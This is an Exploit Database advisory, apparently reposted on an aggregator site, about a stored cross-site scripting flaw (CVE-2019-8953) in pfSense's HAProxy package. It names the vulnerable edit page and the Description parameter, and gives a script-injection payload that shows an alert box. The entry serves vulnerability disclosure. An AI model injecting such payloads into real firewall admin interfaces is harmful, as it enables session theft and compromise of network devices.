pfSense 2.4.4-p1 (HAProxy Package 0.59_14) – Persistent Cross-Site Scripting

• Exploit Database
• 15 阅读

• 作者： Gionathan Reale
  日期： 2019-03-13
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/46538/

• # Exploit Title: pfSense 2.4.4-p1 (HAProxy Package 0.59_14) - Stored Cross-Site Scripting 
  # Date: 13.02.2019 
  # Exploit Author: Gionathan "John" Reale 
  # Vendor Homepage: https://www.pfsense.org 
  # Version: 2.4.4-p1/0.59_14 
  # Software Link: N/A
  # Google Dork: N/A
  # CVE:2019-8953 
  
  ################################################################################################################################## 
  Introduction pfSense® software is a free, open source customized distribution of FreeBSD specifically tailored for use as a firewall and router that is entirely managed via web interface. 
  In addition to being a powerful, flexible firewalling and routing platform, it includes a long list of related features and a package system allowing further expandability without adding bloat and potential security vulnerabilities to the base distribution. 
  HAProxy is free, open source software that provides a high availability load balancer and proxy server for TCP and HTTP-based applications that spreads requests across multiple servers. 
  ################################################################################# 
  
  Example: URL https://192.168.1.1/haproxy/haproxy_listeners_edit.php 
  PARAMETER Description 
  PAYLOAD "><script>alert("test")</script>